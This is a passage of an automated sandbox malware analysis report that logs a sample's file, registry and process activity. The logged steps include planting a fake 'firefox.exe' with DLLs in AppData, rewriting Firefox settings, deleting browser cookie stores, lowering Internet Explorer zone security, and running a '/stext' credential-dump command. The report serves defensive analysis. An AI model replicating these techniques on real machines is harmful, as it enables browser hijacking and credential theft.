0 19136 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-0.dll

0 20160 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

Copyright Joe Security LLC 2018 Page 127 of 149


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-1.dll  0  18624  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-profile-l1-1-0.dll  0  17600  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-rtlsupport-l1-1-0.dll  0  17600  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-string-l1-1-0.dll  0  18112  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-1-0.dll  0  20160  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-2-0.dll  0  18624  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-sysinfo-l1-1-0.dll  0  19136  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-timezone-l1-1-0.dll  0  18112  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-util-l1-1-0.dll  0  18112  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-conio-l1-1-0.dll  0  19136  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-convert-l1-1-0.dll  0  22208  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-environment-l1-1-0.dll  0  18624  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-filesystem-l1-1-0.dll  0  20160  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-heap-l1-1-0.dll  0  18624  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-locale-l1-1-0.dll  0  18624  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-math-l1-1-0.dll  0  28864  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-multibyte-l1-1-0.dll  0  25792  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-private-l1-1-0.dll  0  65536  [hex dump omitted]  success or wait  2  2E30C7  CopyFileA


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-process-l1-1-0.dll  0  19136  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-runtime-l1-1-0.dll  0  22720  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-stdio-l1-1-0.dll  0  24256  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-string-l1-1-0.dll  0  24256  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-time-l1-1-0.dll  0  20672  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-utility-l1-1-0.dll  0  18624  [hex dump omitted]  success or wait  1  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\dependentlibs.list  0  11  4c 4f 4c 5f 44 4c 4c 2e 64 6c 6c  LOL_DLL.dll  success or wait  1  2E30C7  CopyFileA


C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe  0  65536  [hex dump omitted]  success or wait  9  2E30C7  CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\gaddafi-sarkozy-handshake.jpg

0 22117 ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 08 07 06 0a 08 08 08 0b 0a 0a 0b 0e 18 10 0e 0d 0d 0e 1d 15 16 11 18 23 1f 25 24 22 1f 22 21 26 2b 37 2f 26 29 34 29 21 22 30 41 31 34 39 3b 3e 3e 3e 25 2e 44 49 43 3c 48 37 3d 3e 3b ff db 00 43 01 0a 0b 0b 0e 0d 0e 1c 10 10 1c 3b 28 22 28 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b ff c0 00 11 08 01 59 01 cc 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08

......JFIF.............C......

.....................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......Y...."............................................................}........!1A..Qa."q.2....

success or wait 1 2E30C7 CopyFileA

File Path Offset Length Value Ascii Completion Count Source Address Symbol


C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll

0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 00 00 01 00 00 00 00 00 00 00 00 00 e0 00 0e 23 0b 01 02 18 00 0e 00 00 00 b4 01 00 00 02 00 00 60 10 00 00 00 10 00 00 00 20 00 00 00 00 e0 6e 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 73 ac 02 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 48 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ .............n.........................@......s......... .........................H..

success or wait 2 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\mozglue.dll

0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de ac ff e9 9a cd 91 ba 9a cd 91 ba 9a cd 91 ba 93 b5 02 ba 8a cd 91 ba 04 6d 56 ba 98 cd 91 ba a1 93 92 bb 94 cd 91 ba a1 93 95 bb 91 cd 91 ba a1 93 90 bb 9e cd 91 ba a1 93 94 bb 95 cd 91 ba f7 90 90 bb 93 cd 91 ba 9a cd 90 ba 29 cd 91 ba 0f 93 9f bb 89 cd 91 ba 0f 93 91 bb 9b cd 91 ba 08 93 6e ba 9b cd 91 ba 0f 93 93 bb 9b cd 91 ba 52 69 63 68 9a cd 91 ba 00 00 00 00 00 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................mV.................................................).....................n.............Rich...........

success or wait 3 2E30C7 CopyFileA

File Path Offset Length Value Ascii Completion Count Source Address Symbol


C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcp140.dll

0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a bf 9e eb 0e de f0 b8 0e de f0 b8 0e de f0 b8 d3 21 3b b8 0c de f0 b8 07 a6 63 b8 16 de f0 b8 35 80 f1 b9 0d de f0 b8 0e de f1 b8 b1 de f0 b8 35 80 f3 b9 07 de f0 b8 35 80 f4 b9 02 de f0 b8 35 80 f5 b9 18 de f0 b8 35 80 f8 b9 76 de f0 b8 35 80 f0 b9 0f de f0 b8 35 80 0f b8 0f de f0 b8 35 80 f2 b9 0f de f0 b8 52 69 63 68 0e de f0 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J................!;.......c.....5...............5.......5.......5.......5...v...5.......5.......5.......Rich...................

success or wait 7 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcr110.dll

0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 8c 5f 27 3c ed 31 74 3c ed 31 74 3c ed 31 74 3c ed 30 74 8e ed 31 74 c0 9a 88 74 3f ed 31 74 cd 2b ff 74 d7 ec 31 74 cd 2b fc 74 5d ed 31 74 cd 2b e2 74 0b ed 31 74 cd 2b fe 74 84 ed 31 74 cd 2b fb 74 3d ed 31 74 cd 2b f8 74 3d ed 31 74 cd 2b fd 74 3d ed 31 74 52 69 63 68 3c ed 31 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8e 85 98 50 00 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x._'<.1t<.1t<.1t<.0t..1t...t?.1t.+.t..1t.+.t].1t.+.t..1t.+.t..1t.+.t=.1t.+.t=.1t.+.t=.1tRich<.1t................PE..L......P...

success or wait 14 2E30C7 CopyFileA

File Path Offset Length Value Ascii Completion Count Source Address Symbol


C:\Users\user\AppData\Roaming\F48A04623C4E0000\ucrtbase.dll

0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 90 60 9b 4d d4 01 f5 1e d4 01 f5 1e d4 01 f5 1e dd 79 66 1e e7 01 f5 1e d4 01 f4 1e 5a 01 f5 1e f3 c7 8b 1e d5 01 f5 1e b9 5c f1 1f c7 01 f5 1e b9 5c f5 1f d5 01 f5 1e b9 5c f6 1f 8a 01 f5 1e b9 5c f0 1f 82 01 f5 1e b9 5c fb 1f b7 03 f5 1e b9 5c 0a 1e d5 01 f5 1e b9 5c f7 1f d5 01 f5 1e 52 69 63 68 d4 01 f5 1e 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fc 94 99 57 00 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .M.............yf.........Z............\.......\.......\.......\.......\.......\.......\......Rich............PE..L......W...

success or wait 14 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\vcruntime140.dll

0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 c7 c3 9a 27 a6 ad c9 27 a6 ad c9 27 a6 ad c9 fa 59 66 c9 25 a6 ad c9 2e de 3e c9 2c a6 ad c9 27 a6 ac c9 0f a6 ad c9 1c f8 a9 c8 37 a6 ad c9 1c f8 ae c8 34 a6 ad c9 1c f8 a8 c8 23 a6 ad c9 1c f8 a5 c8 3f a6 ad c9 1c f8 ad c8 26 a6 ad c9 1c f8 52 c9 26 a6 ad c9 1c f8 af c8 26 a6 ad c9 52 69 63 68 27 a6 ad c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'...'...'....Yf.%.....>.,...'...........7.......4.......#.......?.......&.....R.&.......&...Rich'...................PE..L..

success or wait 2 2E30C7 CopyFileA

C:\Users\user~1\AppData\Local\Temp\F48A04623C4E0000 unknown 49 43 3a 5c 55 73 65 72 73 5c 4c 55 4b 45 54 41 7e 31 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 69 73 2d 37 49 32 53 53 2e 74 6d 70

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp

success or wait 1 2E43AA WriteFile

File Path Offset Length Value Ascii Completion Count Source Address Symbol

File Path Offset Length Completion Count Source Address Symbol

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\LOL_DLL.dll unknown 65536 success or wait 2 135135A ReadFile

File Read


File Activities

Start time: 14:49:26

Start date: 07/05/2018

Path: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Wow64 process (32bit): false

Commandline: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Imagebase: 0xfa0000

File size: 531408 bytes

MD5 hash: 52FFABA4273678BAE75442F2BC85B470

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: low

File Path Offset Length Completion Count Source Address Symbol

C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll unknown 65536 success or wait 2 FA135A ReadFile

File Activities

Start time: 14:49:26

Start date: 07/05/2018

Path: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Wow64 process (32bit): false

Commandline: 'C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe'

Imagebase: 0xfa0000

File size: 531408 bytes

MD5 hash: 52FFABA4273678BAE75442F2BC85B470

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: low

File Path Access Attributes Options Completion Count Source Address Symbol

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\user.js

read attributes and synchronize and generic read and generic write

normal synchronous io non alert and non directory file

success or wait 1 383AFC CreateFileA

C:\Users\user~1\AppData\Local\Temp\F48A04623C4E000032 read attributes and synchronize and generic write

normal synchronous io non alert and non directory file

success or wait 1 38324B CreateFileA

File Path Completion Count Source Address Symbol

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies success or wait 1 38381B DeleteFileA

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqlite success or wait 1 383AB6 DeleteFileA

Analysis Process: firefox.exe PID: 3948 Parent PID: 3844

General

File Read

Analysis Process: firefox.exe PID: 3964 Parent PID: 1376

General

File Created

File Deleted

File Written


Registry Activities

File Path Offset Length Value Ascii Completion Count Source Address Symbol

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\user.js

unknown 349 75 73 65 72 5f 70 72 65 66 28 22 6e 65 74 77 6f 72 6b 2e 68 74 74 70 2e 73 70 64 79 2e 65 6e 61 62 6c 65 64 2e 76 33 2d 31 22 2c 20 66 61 6c 73 65 29 3b 0d 0a 75 73 65 72 5f 70 72 65 66 28 22 6e 65 74 77 6f 72 6b 2e 68 74 74 70 2e 73 70 64 79 2e 65 6e 61 62 6c 65 64 2e 76 33 22 2c 20 66 61 6c 73 65 29 3b 0d 0a 75 73 65 72 5f 70 72 65 66 28 22 6e 65 74 77 6f 72 6b 2e 68 74 74 70 2e 73 70 64 79 2e 65 6e 61 62 6c 65 64 22 2c 20 66 61 6c 73 65 29 3b 0d 0a 75 73 65 72 5f 70 72 65 66 28 22 62 72 6f 77 73 65 72 2e 74 61 62 73 2e 72 65 6d 6f 74 65 2e 61 75 74 6f 73 74 61 72 74 22 2c 20 66 61 6c 73 65 29 3b 0d 0a 75 73 65 72 5f 70 72 65 66 28 22 62 72 6f 77 73 65 72 2e 74 61 62 73 2e 72 65 6d 6f 74 65 2e 61 75 74 6f 73 74 61 72 74 2e 32 22 2c 20 66 61 6c 73 65 29

user_pref("network.http.spdy.enabled.v3-1", false);..user_pref("network.http.spdy.enabled.v3", false);..user_pref("network.http.spdy.enabled", false);..user_pref("browser.tabs.remote.autostart", false);..user_pref("browser.tabs.remote.autostart.2", false)

success or wait 1 383BBD WriteFile

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\user.js

unknown 19 23 46 34 38 41 30 34 36 32 33 43 34 45 30 30 30 30 0d 0a

#F48A04623C4E0000.. success or wait 1 383BDB WriteFile

C:\Users\user~1\AppData\Local\Temp\F48A04623C4E000032 unknown 517120 0b 6e a8 41 33 34 36 32 37 43 34 45 cf cf 30 30 fe 34 38 41 30 34 36 32 73 43 34 45 30 30 30 30 46 34 38 41 30 34 36 32 33 43 34 45 30 30 30 30 46 34 38 41 30 34 36 32 33 43 34 45 c0 30 30 30 48 2b 82 4f 30 80 3f ff 12 fb 35 09 fd 11 64 58 2f 47 18 31 42 5b 51 40 52 2e 14 26 51 5e 5e 5f 32 14 5a 24 10 46 43 5c 13 2a 5a 65 74 7f 63 10 2b 5b 5c 24 1e 39 3b 38 17 43 34 45 30 30 30 30 ae ec 8c 61 9c 8d ec 41 9f fa ee 36 9c 89 ea 43 1b 4b 2d 32 8a 8d ec 41 6e 3c 23 36 95 89 ea 43 1b 4b 2c 32 c1 8d ec 41 96 82 6d 36 9f 89 ea 43 e3 f5 71 32 9b 8d ec 41 9f fa ef 36 f2 89 ea 43 c9 62 2c 32 99 8d ec 41 bc 15 21 36 8a 89 ea 43 8c 63 2b 32 9d 8d ec 41 f9 14 22 36 9d 89 ea 43 14 5d 5b 29 9c 8d ec 41 33 43 34 45 30 30 30 30 16 71 38 41 7c 35 33 32 42 c7 d9 1f 30 30 30

.n.A34627C4E..00.48A0462sC4E0000F48A04623C4E0000F48A04623C4E.000H+.O0.?...5...dX/G.1B[Q@R..&Q^ _2.Z$.FC\.*Zet.c.+[\$.9;8.C4E0000...a...A...6...C.K-2...An<#6...C.K,2...A..m6...C..q2...A...6...C.b,2...A..!6...C.c+2...A.."6...C.][)...A3C4E0000.q8A|532B...000

success or wait 1 383263 WriteFile

File Path Offset Length Completion Count Source Address Symbol

C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll unknown 65536 success or wait 2 FA135A ReadFile

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\user.js unknown 0 success or wait 1 383B3A ReadFile

C:\Users\user~1\AppData\Local\Temp\F48A04623C4E000032 unknown 517120 success or wait 1 383D43 ReadFile

File Read


Key Path Name Type Data Completion Count Source Address Symbol

HKEY_USERS\Software\Microsoft\Internet Explorer\Main

TabProcGrowth dword 0 success or wait 1 383C4B RegSetValueExA

HKEY_USERS\Software\Microsoft\Internet Explorer\Main

NoProtectedModeBanner dword 1 success or wait 1 383C6B RegSetValueExA

HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

2500 dword 3 success or wait 1 383CB4 RegSetValueExA

Key Path Name Type Old Data New Data Completion Count Source Address Symbol

File Activities

Start time: 14:49:46

Start date: 07/05/2018

Path: C:\Windows\System32\dllhost.exe

Wow64 process (32bit): false

Commandline: C:\Windows\system32\dllhost.exe

Imagebase: 0x390000

File size: 7168 bytes

MD5 hash: A63DC5C2EA944E6657203E0C8EDEAF61

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: low

File Path Access Attributes Options Completion Count Source Address Symbol

C:\Users\user\AppData\Roaming\F48A04623C4E0000 read data or list directory and synchronize

normal directory file and synchronous io non alert and open for backup ident and open reparse point

object name collision 1 A685A CreateDirectoryA

C:\Users\user\AppData\Roaming\F48A04623C4E0000 read data or list directory and synchronize

normal directory file and synchronous io non alert and open for backup ident and open reparse point

object name collision 1 A685A CreateDirectoryA

C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp read attributes and synchronize and generic read

normal synchronous io non alert and non directory file

success or wait 1 ACDBB GetTempFileNameA

C:\Users\user~1\AppData\Local\Temp\_pE740.tmp read attributes and synchronize and generic read

normal synchronous io non alert and non directory file

success or wait 1 ACDBB GetTempFileNameA

C:\Users\user\AppData\Roaming\F48A04623C4E0000 read data or list directory and synchronize

normal directory file and synchronous io non alert and open for backup ident and open reparse point

object name collision 52 A685A CreateDirectoryA

File Path Completion Count Source Address Symbol

C:\Users\user~1\AppData\Local\Temp\F48A04623C4E0000 success or wait 1 A86C2 DeleteFileA

File Path Offset Length Value Ascii Completion Count Source Address Symbol

Key Value Created

Analysis Process: dllhost.exe PID: 2032 Parent PID: 3964

General

File Created

File Deleted

File Read


Registry Activities

File Path Offset Length Completion Count Source Address Symbol

C:\Users\user~1\AppData\Local\Temp\F48A04623C4E000032 unknown 517120 success or wait 1 A71C6 ReadFile

C:\Users\user~1\AppData\Local\Temp\F48A04623C4E0000 unknown 49 success or wait 1 A86AE ReadFile

Key Path Name Type Old Data New Data Completion Count Source Address Symbol

Start time: 14:49:47

Start date: 07/05/2018

Path: C:\Windows\System32\cmd.exe

Wow64 process (32bit): false

Commandline: cmd.exe /c del /f /q %temp%\gif*

Imagebase: 0x4aae0000

File size: 302592 bytes

MD5 hash: AD7B9C14083B52BC532FBA5948342B98

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: low

File Activities

Start time: 14:49:53

Start date: 07/05/2018

Path: C:\Windows\System32\msiexec.exe

Wow64 process (32bit): false

Commandline: '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE740.tmp'

Imagebase: 0x6b0000

File size: 73216 bytes

MD5 hash: 4315D6ECAE85024A0567DF2CB253B7B0

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: low

File Path Access Attributes Options Completion Count Source Address Symbol

C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp read attributes and synchronize and generic read

normal synchronous io non alert and non directory file

success or wait 1 407ACF GetTempFileNameW

File Path Completion Count Source Address Symbol

C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp success or wait 1 4097C0 DeleteFileW

File Path Offset Length Value Ascii Completion Count Source Address Symbol

Analysis Process: cmd.exe PID: 1036 Parent PID: 2032

General

Analysis Process: msiexec.exe PID: 1916 Parent PID: 2032

General

File Created

File Deleted

File Written


C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 21037056 29 6a 0a 15 ef cd ab 89 20 06 00 00 00 00 00 00 fe 88 00 00 00 00 00 00 f1 ae 02 00 24 08 07 1a 07 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 6c 00 fa 01 12 00 00 00 04 34 09 1c 09 75 01 00 13 35 09 1c 09 75 01 00 dd 00 fb 01 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2c a2 02 00 24 08 07 1a 07 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 06 00 00 00 01 00 00 00 b1 1d 00 00 01 00 00 00 11 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

)j...... ...................$....t......................l........4...u...5...u..............................,...$....t..............................................................................................*..........................................

success or wait 1 40934B WriteFile

C:\Users\user~1\AppData\Local\Temp\_pE740.tmp unknown 2 ff fe .. success or wait 1 408261 WriteFile

File Path Offset Length Value Ascii Completion Count Source Address Symbol

File Path Offset Length Completion Count Source Address Symbol

C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 1024 success or wait 1 408242 ReadFile

C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 32768 success or wait 1 408242 ReadFile

C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 32768 success or wait 1 408242 ReadFile

C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 32768 success or wait 1 408242 ReadFile

C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 32768 success or wait 1 408242 ReadFile

C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 32768 success or wait 1 408242 ReadFile

